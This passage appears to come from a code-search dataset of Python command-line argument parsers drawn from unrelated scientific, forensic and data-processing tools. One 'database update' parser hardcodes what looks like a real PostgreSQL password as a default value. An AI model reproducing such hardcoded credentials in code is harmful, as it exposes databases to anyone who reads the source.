in hours from starttime')\n print (' Note: if duration is neg, starttime becomes endtime')\n print (' N, S, C and a datacenter if other than IRIS')\n print (' -N, --net Network code')\n print (' -S, --sta Station code')\n print (' -C, --cha Channel type, e.g. EN or HH')\n print (' -dc, --datacenter Name of FDSN data center if not IRIS, e.g. SCEDC, NCEDC')\n print (' ')\n print ('Optional flags:')\n print ('-P, --plot Flag to make a figure for each hour. 
Note: can be slow.')\n print ('-u Print this extended help menu')\n print ('')\n\n\n return parser.parse_args(_preprocess_sysargv(sys.argv))", "def parse_args(self):\n return self.__process_args__(self.parser.parse_args())", "def parseArguments(self):\n iterator = iter(sys.argv[1:]) # Skip file name\n for argument in iterator:\n if len(argument) < 2 or argument[:2] != '--':\n self.error('syntax error \"{}\"'.format(argument))\n else:\n def getValueOfArgument(): return next(iterator)\n self.parseArgument(argument[2:], getValueOfArgument)", "def _configure_args(self, parser: ArgumentParser) -> ArgumentParser:\n pass", "def main_parse_args():\n parser = ArgumentParser()\n parser = cf.add_config_args(parser)\n args = parser.parse_args()\n config_opts = sys.argv[1:]\n # add working_dir to config_opts\n found_wd = False\n for opt in ['-wd', '--working_dir']:\n if opt in config_opts:\n found_wd = True\n if not found_wd:\n config_opts.extend(['-wd', args.working_dir])\n # remove src_classes from config_opts\n for opt in ['-srcs', '--src_classes']:\n if opt in config_opts:\n idx = config_opts.index(opt)\n config_opts.pop(idx)\n # pop next item\n config_opts.pop(idx)\n args.config_opts = \" \".join(config_opts)\n return args", "def parseArguments():\n parser = argparse.ArgumentParser(description=\"AutoMacTC: an Automated macOS forensic triage collection framework.\", add_help=False)\n\n module_filter = parser.add_argument_group('module filter')\n mods = module_filter.add_mutually_exclusive_group(required=False)\n mods.add_argument('-m', '--include_modules', type=str, nargs='+', help='module(s) to use, use \"all\" to run all modules, space separated list only', default=[''], required=False)\n mods.add_argument('-x', '--exclude_modules', type=str, nargs='+', help='assumes you want to run all modules EXCEPT those specified here, space separated list only', default=[''], required=False)\n mods.add_argument('-l', '--list_modules', help='if flag is provided, will list available modules and exit.', default=False, action='store_true', required=False)\n\n general = parser.add_argument_group('general arguments')\n general.add_argument(\"-h\", \"--help\", action=\"help\", help=\"show this help message and exit\")\n general.add_argument(\"-v\", \"--verbose\", default=False, action='store_true', help=\"enable verbose logging\")\n general.add_argument('-i', '--inputdir', default='/', help='input directory; mount dmg with mountdmg.sh script and use -f to analyze mounted HFS or APFS Volume, use volume appended with \"Data\" (e.g. \"Macintosh HD - Data\") for 10.15+ systems', required=False)\n general.add_argument('-is', '--inputsysdir', default='', help='input system drive if using mounted drive from 10.15+ system (e.g. 
\"Macintosh HD\")', required=False)\n general.add_argument('-o', '--outputdir', default='./', help='output directory', required=False)\n general.add_argument('-p', '--prefix', help='prefix to append to tarball and/or output files', default='automactc-output', required=False)\n general.add_argument('-f', '--forensic_mode', help='if flag is provided, will analyze mounted volume provided as inputdir', default=False, action='store_true', required=False)\n general.add_argument('-nt', '--no_tarball', help='if flag is provided, will NOT package output files into tarball', default=False, action='store_true', required=False)\n general.add_argument('-nl', '--no_logfile', help='if flag is provided, will NOT generate logfile on disk', default=False, action='store_true', required=False)\n general.add_argument('-fmt', '--output_format', help='toggle between csv and json output, defaults to csv', default='csv', action='store', required=False, choices=['csv', 'json'])\n general.add_argument('-np', '--no_low_priority', help='if flag is provided, will NOT run automactc with highest niceness (lowest CPU priority). high niceness is default', default=False, action='store_true', required=False)\n general.add_argument('-b', '--multiprocessing', help='if flag is provided, WILL multiprocess modules [WARNING: Experimental!]', default=False, action='store_true', required=False)\n general.add_argument('-O', '--override_mount', help='if flag is provided, WILL bypass error where inputdir does not contain expected subdirs', default=False, action='store_true', required=False)\n\n console_log_args = parser.add_argument_group('console logging verbosity')\n console_logging_args = console_log_args.add_mutually_exclusive_group(required=False)\n console_logging_args.add_argument('-q', '--quiet', help='if flag is provided, will NOT output to console at all', default=False, action='store_true', required=False)\n console_logging_args.add_argument('-r', '--rtr', help='reduce verbosity to display nicely on RTR console', default=False, action='store_true', required=False)\n console_logging_args.add_argument('-d', '--debug', help='enable debug logging to console', default=False, action='store_true', required=False)\n\n dirlist_args = parser.add_argument_group('specific module arguments')\n dirlist_args.add_argument('-K', '--dir_include_dirs', type=str, nargs='+', help='directory inclusion filter for dirlist module, defaults to volume root, space separated list only', default=[''], required=False)\n dirlist_args.add_argument('-E', '--dir_exclude_dirs', type=str, nargs='+', help='directory and file exclusion filter for dirlist module. defaults are specified in README. space separated list only. \\\n put \\'no-defaults\\' as first item to overwrite default exclusions and then provide your own exclusions', default=[''], required=False)\n dirlist_args.add_argument('-H', '--dir_hash_alg', nargs='+', help='either sha256 or md5 or both or none, at least one is recommended, defaults to sha256. also applies to autoruns module', default='sha256', required=False)\n dirlist_args.add_argument('-S', '--dir_hash_size_limit', type=int, help='file size filter for which files to hash, in megabytes, defaults to 10MB. also applies to autoruns module', default=10, required=False)\n dirlist_args.add_argument('-R', '--dir_recurse_bundles', help='will fully recurse app bundles if flag is provided. 
this takes much more time and space', default=False, action='store_true', required=False)\n dirlist_args.add_argument('-NC', '--dir_no_code_signatures', help='if flag is provided, will NOT check code signatures for app and kext files. also applies to autoruns module', default=False, action='store_true', required=False)\n dirlist_args.add_argument('-NM', '--dir_no_multithreading', help='if flag is provided, will NOT multithread the dirlist module', default=False, action='store_true', required=False)\n args = parser.parse_args()\n\n return args", "def parse_cmd_arguments():\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('-i', '--input', required=True, help='input JSON file')\n parser.add_argument('-o', '--output', required=True,\n help='ouput JSON file')\n parser.add_argument('-d', '--debug', required=False,\n help='log level. Can be 0-3. Defaults to 0')\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '--src',\n help='path to update file',\n required=True)\n\n parser.add_argument(\n '--dst',\n help='working directory',\n required=True)\n\n parser.add_argument(\n '--disable_rollback',\n help='disable rollabck in case of errors',\n action='store_false')\n\n return parser.parse_args()", "def parse_command_line(self, argv):\n from optparse import OptionParser\n usage = \"usage: %prog [options]\"\n parser = OptionParser(usage)\n\n (options, args) = parser.parse_args(argv)", "def parseCommandLine_(self):\n\n self.ensureNotCreated()\n\n import sys\n\n parseCommandLine = False\n for argv in sys.argv:\n if 'globalTag' in argv or 'era' in argv or 'process' in argv:\n parseCommandLine = True\n break\n\n if parseCommandLine:\n from FWCore.ParameterSet.VarParsing import VarParsing\n options = VarParsing()\n options.register('globalTag',\n '',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n 'The globaltag to use')\n\n options.register('era',\n '',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n 'Era of the dataset')\n\n options.register('process',\n '',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n 'Process name of the MiniAOD production.')\n\n options.parseArguments()\n\n if options.globalTag:\n self.globalTag = options.globalTag\n\n if options.era:\n assert options.era == '25ns' or options.era == '50ns'\n if options.era == '25ns':\n self.era = eras.Run2_25ns\n else:\n self.era = eras.Run2_50ns\n\n if options.process:\n self.processName = options.process", "def parse_args(args):\n\n parser = argparse.ArgumentParser(\n description=\"\"\"Generates and runs an afni_proc.py script to preprocess resting state fMRI data\"\"\",\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n # Optional Flags\n parser.add_argument(\"-t\", \"--trs_remove\", action=\"store\", default=5, type=int, metavar='TRs',\n help=\"\"\"number of trs to remove at the beginning of the epi data\n (default = 5 trs)\"\"\")\n parser.add_argument(\"-d\", \"--dim_voxel\", action=\"store\", default=2.0, type=float, metavar='MM',\n help=\"voxel dimensions in mm that processed epi will be resampled to (default = 2.0 mm)\")\n parser.add_argument(\"-b\", \"--bandpass\", action=\"store\", default=[0.01, 0.25], nargs=2, type=float, metavar=\"F\",\n help=\"bandpass frequencies lower and upper limits (default = 0.01 0.25)\")\n parser.add_argument(\"-v\", \"--volumes\", action=\"store\", default=0, type=int, metavar=\"V\",\n help=\"\"\"truncate the epi data to the inputted 
number of volumes, useful if subjects have data \n with different numbers of volumes (default = no truncation)\"\"\")\n parser.add_argument(\"-f\", \"--fwhm\", action=\"store\", default=5.0, type=float, metavar=\"MM\",\n help=\"the full width half maximum that is used when blurring (default = 5.0 mm)\")\n parser.add_argument(\"-c\", \"--cores\", action=\"store\", default=cpu_count(), type=int, metavar=\"C\",\n help=\"number of cores supplied to 3dDeconvolve (default = all cores)\")\n parser.add_argument(\"-s\", \"--subj_id\", action=\"store\", default=\"sub\", metavar=\"SUB\",\n help=\"text file of subject ids (default = sub)\")\n parser.add_argument(\"-T\", \"--time_step\", action=\"store\", default=0, type=float, metavar=\"TS\",\n help=\"set the time step for bandpassing (default = ts in header info\")\n\n parser.add_argument(\"-g\", \"--global_signal_regression\", action=\"store_false\", default=True,\n help=\"do not perform global signal regression (default = perform gsr)\")\n\n parser.add_argument(\"-r\", \"--rerun\", action=\"store_true\", default=False,\n help=\"\"\"rerun preprocessing, override and delete previous results in \n 'Processed' folder (default = don't override)\"\"\")\n parser.add_argument(\"-m\", \"--motion_param\", action=\"store_true\", default=False,\n help=\"use 12 motion parameters for regression (default = 6 motion parameters)\")\n parser.add_argument(\"-G\", \"--gm_blur\", action=\"store_true\", default=False,\n help=\"blur only in grey matter mask (default = blur in whole brain)\")\n parser.add_argument(\"-n\", \"--nl_reg\", action=\"store_true\", default=False,\n help=\"use non-linear warp between anatomical and MNI template (default = linear warp)\")\n\n # Required Inputs\n required = parser.add_argument_group(\"required arguments\")\n required.add_argument(\"-e\", \"--epi\", action=\"store\", required=True,\n help=\"text file of paths to raw epi data\")\n required.add_argument(\"-a\", \"--anat\", action=\"store\", required=True,\n help=\"text file of paths to raw anatomical data\")\n required.add_argument(\"-o\", \"--out_dir\", action=\"store\", required=True, metavar=\"OUT\",\n help=\"text file of paths to output directory\")\n result = parser.parse_args(args)\n\n # Make sure inputted parameters are legal\n assert (os.path.isfile(result.epi)), \"{} does not exist or is not a file\".format(result.epi)\n assert (os.path.isfile(result.anat)), \"{} does not exist or is not a file\".format(result.ant)\n assert (result.trs_remove >= 0), \"Cannot remove negative trs\"\n assert (result.dim_voxel >= 0), \"Cannot have a negative voxel dimension\"\n assert (np.all(np.array(result.bandpass) > 0)), \"Cannot have a negative frequency limit for bandpassing\"\n assert (result.volumes > -1), \"Number of volumes must be greater than 0\"\n assert (result.cores > 0), \"Number of cores used must be greater than 0\"\n assert (result.time_step > -1), \"Time step must be greater than 0\"\n\n return result", "def set_args() -> argparse.ArgumentParser:\n parser = argparse.ArgumentParser( # type: argparse.ArgumentParser\n description=r'''\n -----------------------------------\n < Pull DNA barcodes from FASTQ files >\n -----------------------------------\n /\n \\ ______/ V`-, /\n } /~~\n /_)^ --,r'\n |b |b\n ''',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n add_help=False\n )\n # Arguments for verbosity and logging\n parser.add_argument( # Verbosity\n '-v',\n '--verbosity',\n dest='verbosity',\n type=str.lower,\n choices=_VERBOSITY_LEVELS,\n default=_VERBOSITY_DEFAULT,\n 
required=False,\n metavar='verbosity',\n help=\"Set the verbosity level, choose from '%s'; defaults to '%s'\" % (\"', '\".join(_VERBOSITY_LEVELS), _VERBOSITY_DEFAULT)\n )\n parser.add_argument( # Number of cores\n '--parallel',\n dest='num_cores',\n type=_num_cores,\n const=None,\n default=1,\n nargs='?',\n required=False,\n metavar='num jobs',\n help=\"Run %(prog)s in parallel; if passed, can optionally specify the number of jobs to run at once\"\n )\n parser.add_argument( # Output directory\n '-o',\n '--output-directory',\n dest='outdirectory',\n type=str,\n default=_OUTDIR_DEFAULT,\n required=False,\n metavar='output directory',\n help=\"Choose where all output files are to be stored; defaults to '%s'\" % _OUTDIR_DEFAULT\n )\n # Input arguments\n inputs = parser.add_argument_group(\n title='input arguments',\n description='Provide inputs for %(prog)s'\n )\n inputs.add_argument( # Forward FASTQ\n '-f',\n '--forward-fastq',\n dest='forward',\n type=str,\n default=None,\n required=True,\n metavar='FORWARD FASTQ',\n help=\"Provide a filepath for the forward/single FASTQ file\"\n )\n inputs.add_argument( # Reverse FASTQ\n '-r',\n '--reverse-fastq',\n dest='reverse',\n type=str,\n default=None,\n required=False,\n metavar='REVERSE FASTQ',\n help=\"Provide a filepath for the optional reverse FASTQ file\"\n )\n inputs.add_argument( # Sample sheet\n '-s',\n '--sample-sheet',\n dest='sample_sheet',\n type=str,\n default=None,\n required=True,\n metavar='SAMPLE SHEET',\n help=\"Provide a filepath for the sample sheet\"\n )\n inputs.add_argument( # Barcodes file\n '-b',\n '--barcodes',\n dest='barcodes',\n type=str,\n required=True,\n default=None,\n metavar='BARCODES',\n help=\"Provide a filepath for the barcodes CSV file\"\n )\n barcodes = parser.add_argument_group(\n title='barcode options',\n description=\"Set parameters for barcode demultiplexing\"\n )\n barcodes.add_argument( # Number of errors allowed\n '-e',\n '--error',\n dest='error',\n type=int,\n default=_ERROR_DEFAULT,\n required=False,\n metavar='ERROR',\n help=\"This is how many mismatches in the barcode we allowed before rejecting, defaults to %s\" % _ERROR_DEFAULT\n )\n return parser", "def parseArg(self, c):\n\n\t\trocks.app.Application.parseArg(self, c)\n\n\t\tif c[0] in ('--conf', '-c'):\n\t\t\tself.config.setFile(c[1])\n\t\t\tself.config.parse()\n\t\telif c[0] in ('--master',):\n\t\t\tself.masters = [rocks.service411.Master(c[1])]\n\t\telif c[0] in ('--shared',):\n\t\t\tself.shared_filename = c[1]\n\t\telif c[0] in ('--pub',):\n\t\t\tself.pub_filename = c[1]\n\t\telif c[0] == \"--comment\":\n\t\t\tself.comment = c[1]\n\t\telif c[0] == \"--all\":\n\t\t\tself.getall = 1\n\t\telif c[0] in (\"--local\", \"--file\"):\n\t\t\tself.doFile = 1\n\t\telif c[0] in (\"-v\", \"--verbose\"):\n\t\t\tself.verbose += 1", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Normalize the BraTS data set\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n input_options = parser.add_argument_group(\"Input\")\n input_options.add_argument('--brats', required=True, help=\"BraTS root data set directory\")\n input_options.add_argument('--year', required=True, type=int, default=2018, help=\"BraTS year\")\n\n output_options = parser.add_argument_group(\"Output\")\n output_options.add_argument('--output', required=True, help=\"Output directory of normalized data set\")\n\n general_options_group = parser.add_argument_group(\"General\")\n general_options_group.add_argument(\"--pool-size\", type=int, default=8, help=\"Size of worker 
pool\")\n\n logging_options_group = parser.add_argument_group(\"Logging\")\n logging_options_group.add_argument('--log', dest=\"log_level\", default=\"WARNING\", help=\"Logging level\")\n logging_options_group.add_argument('--log-file', default=\"normalize.log\", help=\"Log file\")\n\n args = parser.parse_args()\n\n # Setup the logger\n global logger\n logger = logging.getLogger('root')\n\n # Logging level configuration\n log_level = getattr(logging, args.log_level.upper())\n if not isinstance(log_level, int):\n raise ValueError('Invalid log level: %s' % args.log_level)\n logger.setLevel(log_level)\n\n log_formatter = logging.Formatter('[%(asctime)s][%(levelname)s][%(funcName)s] - %(message)s')\n\n # For the log file...\n file_handler = logging.FileHandler(args.log_file)\n file_handler.setFormatter(log_formatter)\n logger.addHandler(file_handler)\n\n # For the console\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(log_formatter)\n logger.addHandler(console_handler)\n return args", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"Reads datapacket pcds, interpolates quaternions and generates scans from dataset in config file\")\n parser.add_argument(\"--visualization\", \"-v\", action=\"store_true\", help=\"if generated clouds should be visualized\")\n parser.add_argument(\"--directory\", \"-d\",\n help=\"if only specified directory should be interpolated, e.g. 'fragments/fragment0'\")\n args = parser.parse_args()\n return args.visualization, args.directory", "def parse_args():\n parser = argparser()\n args = parser.parse_args()\n\n # --------------------------------------------------------- #\n # Parse and check runtime parameters.\n # --------------------------------------------------------- #\n\n # check validity of cores selection.\n max_ppn = max_cpu() + 1\n if args.proc_per_node > max_ppn:\n warnings.warn('{0} is greater than the number of available cores ({1}). Reducing to {2}'\n .format(args.proc_per_node, max_ppn, max_ppn - 1))\n args.proc_per_node = max_ppn - 1\n\n # ensure that user has supplied fresh .bam/.bai files or a directory containing alignment files.\n if not args.bam_files and not args.bam_dir:\n raise ValueError('Must specify either --bam-files or --bam-dir.')\n\n if args.bam_files and args.bam_dir:\n raise ValueError('Both --bam-files and --bam-dir were provided! Not sure which data set to use.')\n\n # --------------------------------------------------------- #\n # Gather input RNA-Seq + genome annotation files.\n # --------------------------------------------------------- #\n\n # check validity of gene annotation file selection.\n if not args.genome_annotation:\n raise ValueError('If warm-start directory not specified, gene annotation file must be specified!')\n\n else:\n if not os.path.isfile(args.genome_annotation):\n raise FileNotFoundError('Gene annotation file {0} not found.'.format(args.genome_annotation))\n\n # check validity of file i/o selection.\n bam_files = list()\n bai_files = list()\n create_bai_files = list()\n\n # INPUT OPTION 1: a --bam-dir was specified.\n if args.bam_dir:\n\n # if user used both --bam-dir and --bam-files and/or --bai-files, yell at them. 
(only use one method).\n if args.bam_files is not None or args.bai_files is not None:\n raise ValueError('Do not specify both a --bam-dir and either --bam-files and/or --bai-files.'\n 'Use one input selection method or the other.')\n\n # check that the dir actually exists.\n if not os.path.isdir(args.bam_dir):\n raise NotADirectoryError('Cannot find --bam-dir {0}'.format(args.bam_dir))\n\n # scan directory for .bam files.\n for f in os.listdir(args.bam_dir):\n if f.endswith('.bam'):\n bam_files.append(os.path.join(args.bam_dir, f))\n\n # search for .bai files in the --bam-dir. If they don't exist, try to make them.\n for bam_file in bam_files:\n bai_file = re.sub('.bam$', '.bai', bam_file)\n\n # if .bai file under same basename as .bam file doesn't exist,\n # add it to list of .bai files that need to be created.\n if not os.path.isfile(bai_file):\n bai_files.append(bai_from_bam_file(bam_file))\n create_bai_files.append(bam_file)\n else:\n bai_files.append(bai_file)\n\n # INPUT OPTION 2: --bam-files and possibly --bai-files were specified.\n else:\n # ensure .bam files are actually .bam files.\n for bam_file in args.bam_files:\n if not bam_file.endswith('.bam'):\n raise ValueError('{0} is not a .bam file.'.format(bam_file))\n elif not os.path.isfile(bam_file):\n raise FileNotFoundError('Count not find .bam file {0}'.format(bam_file))\n else:\n bam_files.append(bam_file)\n\n # case where user has specified .bai files to accompany .bam files.\n if args.bai_files is not None:\n # if user has supplied an incorrect number of bai files, fail out.\n if len(args.bai_files) != len(bam_files):\n raise ValueError('Number of supplied .bai files does not match number of supplied .bam files.')\n\n # ensure .bai files are actually .bai files.\n for bai_file in args.bai_files:\n if not bai_file.endswith('.bai'):\n raise ValueError('{0} is not a .bai file.'.format(bai_file))\n elif not os.path.isfile(bai_file):\n raise FileNotFoundError('Count not find .bai file {0}'.format(bai_file))\n else:\n bai_files.append(bai_file)\n\n # if user has not supplied any bai files: look for them under the same name\n # as each of the .bam files, or create new .bai files with samtools (if possible).\n else:\n for bam_file in bam_files:\n bai_file = re.sub('.bam$', '.bai', bam_file)\n\n # if .bai file under same name as .bam file doesn't exist,\n # add it to list of .bam files for which we need to create a .bai file.\n if not os.path.isfile(bai_file):\n bai_files.append(bai_from_bam_file(bam_file))\n create_bai_files.append(bam_file)\n else:\n bai_files.append(bai_file)\n\n # ensure that input files are uniquely named.\n if len(bam_files) != len(set(bam_files)):\n raise ValueError('Supplied .bam files are not uniquely named!')\n\n # create parser attributes for bam/index files.\n args.bam_files = bam_files\n args.bai_files = bai_files\n args.create_bai_files = create_bai_files\n\n return args", "def parse_command_line_arguments(argv):\n print(\"reading command line arguments in...\")\n\n parser = argparse.ArgumentParser(description='Description of your program')\n parser.add_argument('-i', '--input', help='Location of input csv file', required=True)\n parser.add_argument('-p', '--predicting', help='The column name containing the category to predict', required=True)\n parser.add_argument('-s', '--scoring', help='The scoring type to be used with model evaluation', required=False)\n parser.add_argument('-c', '--scale', help='List of column names to scale values for', nargs='+', required=False)\n args = parser.parse_args()\n\n 
return args.input, args.predicting, args.scoring, args.scale", "def parse_args(unparsed_args_list):\n\n IMPORT_HELP = (\"Pipeline to import new genome data into \"\n \"a MySQL database.\")\n DATABASE_HELP = \"Name of the MySQL database to import the genomes.\"\n INPUT_FOLDER_HELP = (\"Path to the folder containing files to be processed.\")\n IMPORT_TABLE_HELP = \"\"\"\n Path to the CSV-formatted table containing\n instructions to process each genome.\n Structure of import ticket table:\n 1. Action to implement on the database (add, remove, replace, update)\n 2. PhageID to add or update\n 3. Host genus of the updated phage\n 4. Cluster of the updated phage\n 5. Subcluster of the updated phage\n 6. Annotation status of the updated phage (draft, final, unknown)\n 7. Annotation authorship of the updated phage (hatfull, gbk)\n 8. Gene description field of the updated phage (product, note, function)\n 9. Accession of the updated phage\n 10. Run mode of the updated phage\n 11. PhageID that will be removed or replaced\")\n \"\"\"\n PROD_RUN_HELP = \\\n (\"Indicates whether the script should make any changes to the database. \"\n \"If True, the production run will implement all changes in the \"\n \"indicated database. If False, the test run will not \"\n \"implement any changes.\")\n\n parser = argparse.ArgumentParser(description=IMPORT_HELP)\n parser.add_argument(\"database\", type=str, help=DATABASE_HELP)\n parser.add_argument(\"input_folder\", type=str, help=INPUT_FOLDER_HELP)\n parser.add_argument(\"import_table\", type=str, help=IMPORT_TABLE_HELP)\n parser.add_argument(\"-p\", \"--prod_run\", action=\"store_true\",\n default=False, help=PROD_RUN_HELP)\n\n # Assumed command line arg structure:\n # python3 -m pdm_utils <pipeline> <additional args...>\n # sys.argv: [0] [1] [2...]\n args = parser.parse_args(unparsed_args_list[2:])\n return args", "def parse_args(self, args: List[str]) -> Namespace:\n parser = self._to_parser()\n args = parser.parse_args(args)\n if hasattr(args, 'dm_commands'):\n if args.dm_commands is not None:\n args.dm_commands = parse_commands(args.dm_commands)\n else:\n args.dm_commands = list()\n if hasattr(args, 'dm_options'):\n if args.dm_options is not None:\n args.dm_options = parse_options(args.dm_options)\n else:\n args.dm_options = dict()\n LOG.debug(f\"Arguments: {args}.\")\n return args", "def parse_args(self, argv=None):\n self.opts, self.args = self.cli_parser.parse_args(argv)\n self.check_arguments()\n self._post_process_opts_and_args()\n return self.opts, self.args", "def parse_arguments():\n\n info = 'Divides pdb info files for parallelization'\n parser = argparse.ArgumentParser(description=info)\n\n # program arguments\n parser.add_argument('-f', '--in-file',\n type=str,\n required=True,\n help='PDB info file to divide')\n parser.add_argument('-n', '--num-splits',\n default=1000,\n type=int,\n help='Number of splits to perform (Default: 1000)')\n parser.add_argument('-m', '--mut-file',\n type=str,\n required=True,\n help='File containing mutation information')\n parser.add_argument('--split-dir',\n default = \"../data/split_pdbs/\",\n type=str,\n help='Output directory for split PDB info files')\n\n args = parser.parse_args()\n opts = vars(args)\n return opts", "def parse_cmdline(argv):\n if argv is None:\n argv = sys.argv[1:]\n\n # initialize the parser object:\n parser = argparse.ArgumentParser(description='Changes a lammps data file by implementing options such as: '\n 'reorder atom ids in a lammps data file, given a dictionary to '\n 'reorder the atoms (a 
csv of old_index,new_index), and/or '\n 'change the atom, bond, angle, dihedral, and/or improper types,'\n 'given a dictionary to do so. Can also '\n 'print info for selected atom ids. ')\n parser.add_argument(\"-c\", \"--config\", help=\"The location of the configuration file in ini format.\"\n \"The default file name is {}, located in the \"\n \"base directory where the program as run.\".format(DEF_CFG_FILE),\n default=DEF_CFG_FILE, type=read_cfg)\n args = None\n try:\n args = parser.parse_args(argv)\n except IOError as e:\n warning(\"Problems reading file:\", e)\n parser.print_help()\n return args, IO_ERROR\n except (InvalidDataError, KeyError, MissingSectionHeaderError, SystemExit) as e:\n if hasattr(e, 'code') and e.code == 0:\n return args, GOOD_RET\n warning(e)\n parser.print_help()\n return args, INPUT_ERROR\n return args, GOOD_RET", "def parse_args():\n parser = argparse.ArgumentParser(description='database update')\n parser.add_argument('--host', dest='host', help='database host',\n default=\"localhost\")\n parser.add_argument('--database', dest='database', help='database name',\n default='x5gon_dirty')\n parser.add_argument('--user', dest='user', help='database user',\n default=\"postgres\")\n parser.add_argument('--password', dest='password', help='database password',\n default='hayleys')\n parser.add_argument('--procs', dest='procs', help='number of parallel processes',\n default=10)\n parser.add_argument('--out', dest='out', help='output file name',\n default=\"output\")\n parser.add_argument('--tf_conf', dest='tf_conf', help='threshold for TF similarity',\n default=0.85)\n parser.add_argument('--wiki_conf', dest='wiki_conf', help='threshold for WIKI similarity',\n default=0.95)\n arguments = parser.parse_args()\n return arguments", "def parse_args():\n # Define what commandline arguments can be accepted\n parser = argparse.ArgumentParser()\n parser.add_argument(Flags.CSV_DIR,metavar=\"CSV_DIRECTORY\", type=check_str_is_dir,\n help=\"Source directory containing Digikey CSV files\")\n parser.add_argument(Flags.PDF_DIR,metavar=\"PDF_DIRECTORY\", type=check_str_is_dir,\n help=\"Directory to save the PDF datasheets to\")\n parser.add_argument('--csv_pages', dest=Flags.CSV_PAGES,metavar=\"NUM_PAGES\", type=int, default=1,\n help=\"How many 500-row pages to download from Digikey (default 1)\")\n parser.add_argument('--fv_code', dest=Flags.FV_CODE,metavar=\"FV_CODE\", default='ffe002af', #op-amp\n help=\"The FV code of the part family on Digikey (default op-amps)\")\n parser.add_argument('--encrypted', dest=Flags.KEEP_ENCRYPTED, action='store_true', default=False, help=\"Do not filter encrypted PDFs\")\n parser.add_argument('--skip_csv', dest=Flags.SKIP_CSV_DL, action='store_true', default=False, help=\"Do not redownload the CSV.\")\n parser.add_argument('--skip_pdf', dest=Flags.SKIP_PDF_DL, action='store_true', default=False, help=\"Do not redownload the PDFs.\")\n parser.add_argument('--ocr', dest=Flags.KEEP_OCR, action='store_true', default=False, help=\"Do not filter PDFs that need OCR\")\n parser.add_argument('--duplicates', dest=Flags.KEEP_DUPLICATES, action='store_true', default=False, help=\"Do not filter duplicate PDFs (NOT IMPLEMENTED)\")\n parser.add_argument('--version', action='version', version='%(prog)s 0.0.0')\n args = vars(parser.parse_args())\n\n # TODO (lwhsiao): We should also add option to automatically select a parameterized\n # number of files and organize as train/test/dev\n\n Flags.parsed_args = args\n return args", "def 
parse_arguments(raw_args=sys.argv[1:]):\n parser = optparse.OptionParser(\n usage=\"usage: %prog [OPTIONS] DOMAIN_NAME DOMAIN_CONFIG_FILE\",\n description=\"A tool for provisioning a Khan Academy CloudSearch \"\n \"domain.\")\n\n parser.add_option(\"-v\", \"--verbose\", action=\"store_true\", default=False,\n help=\"If specified, DEBUG messages will be printed and more \"\n \"information will be printed with each log message.\")\n\n parser.add_option(\"--leave-temp-dir\", action=\"store_true\", default=False,\n help=\"If specified, the created temporary directory will not be \"\n \"deleted when the script exits.\")\n\n parser.add_option(\"-n\", \"--dry-run\", action=\"store_true\", default=False,\n help=\"If specified, no commands will actually be executed.\")\n\n parser.add_option(\"--no-reindex\", action=\"store_true\", default=False,\n help=\"If specified, will only update the config, without reindexing.\")\n\n options, args = parser.parse_args(raw_args)\n\n if len(args) != 2:\n parser.error(\"You must specify the name of the domain and a file \"\n \"containing the domain configuration.\")\n\n return (options, args[0], args[1])", "def parse_args():\n parser = MyParser(description='Data processing and analytics library \\\n for OpenStack Browbeat perf data')\n\n parser.add_argument('-s', '--summary', dest=\"days\", type=int, default=-1,\n help='-s N summary of last N days of results')\n\n parser.add_argument('--summary-uuid', dest=\"summary_uuid\", type=str,\n default=None,\n help='--summary-uuid UUID summary of a specific uuid')\n\n parser.add_argument('--short-summary', dest=\"short_days\", type=int,\n default=-1,\n help='--short-summary N gives \\\n summary of last N days of results but uses cockroach \\\n db so only provides with basic summary')\n\n parser.add_argument('--upload-timesummary', dest=\"timeseries_uuid\",\n type=str, default=None,\n help='--upload-timesummary UUID \\\n uploads the features computed from data obtained from\\\n graphite. ')\n\n parser.add_argument('--upload-logsummary', dest=\"loggin_uuid\",\n type=str, default=None,\n help='--upload-logsummary UUID \\\n uploads the log summary to crdb \\\n currently just summarizes over entire timeperiod. ')\n\n parser.add_argument('-u', '--update-db', dest='update', type=bool,\n default=False,\n help='-u True pushes data to cockroach db')\n\n parser.add_argument('--update-clf', dest=\"clf_days\", type=int,\n default=-1,\n help='--update-clf 60 will update all classifiers \\\n listed in config file under classifier_lists \\\n using data from last 60 days')\n\n parser.add_argument('--test-clf', dest=\"test_days\", type=int,\n default=-1,\n help='--test-clf 60 will train all classifiers \\\n listed in config file under classifier_lists \\\n using data from last 60 days and then test it \\\n and display metrics')\n\n parser.add_argument('-v', '--osp-version', dest='version', type=str,\n default=None,\n help='-v 11-tripleo only returns hits for that \\\n OpenStack version, \\\n only supported by summary right now')\n\n parser.add_argument('-c', '--config', dest='config', type=str,\n default=pkg_resources.resource_filename('bml',\n \"config.yml\"),\n help='-c <config file path> use custom config file')\n\n args = parser.parse_args()\n return args", "def parse_arguments():\n parser = argparse.ArgumentParser(description='Generates performance metrics from a set of Paraver traces.')\n parser.add_argument('trace_list', nargs='*',\n help='list of traces to process in .prv or .h5 format. 
Accepts wild cards and automaticaly filters for valid traces')\n parser.add_argument('-d', '--debug', help='increases output verbosity to debug level', action='store_true')\n parser.add_argument('-s', '--scaling',\n help='defines whether the measurements are weak or strong scaling (default: auto)',\n choices=['weak', 'strong', 'auto'], default='auto')\n parser.add_argument('-dim', '--dimemas', help='runs Dimemas to get ideal execution times', action='store_true',\n default=False)\n parser.add_argument('-p', '--only_parse', action='store_true', help='only parse the trace_list. This option is provided to control parsing parameters')\n parser.add_argument('--chunk_size', metavar='MB', type=int, default=1024, help='parser option: limits maximum size of the file to hold in memory (default 1GB)')\n parser.add_argument('-c', '--comp_lvl', metavar='LVL', default=0, help='parser option: sets the compression level (between 0 and 9). Default is 0 (no compression)')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n cmdl_args = parser.parse_args()\n\n prv_parser_args['--chunk_size'] = cmdl_args.chunk_size\n prv_parser_args['--comp_lvl'] = cmdl_args.comp_lvl\n if 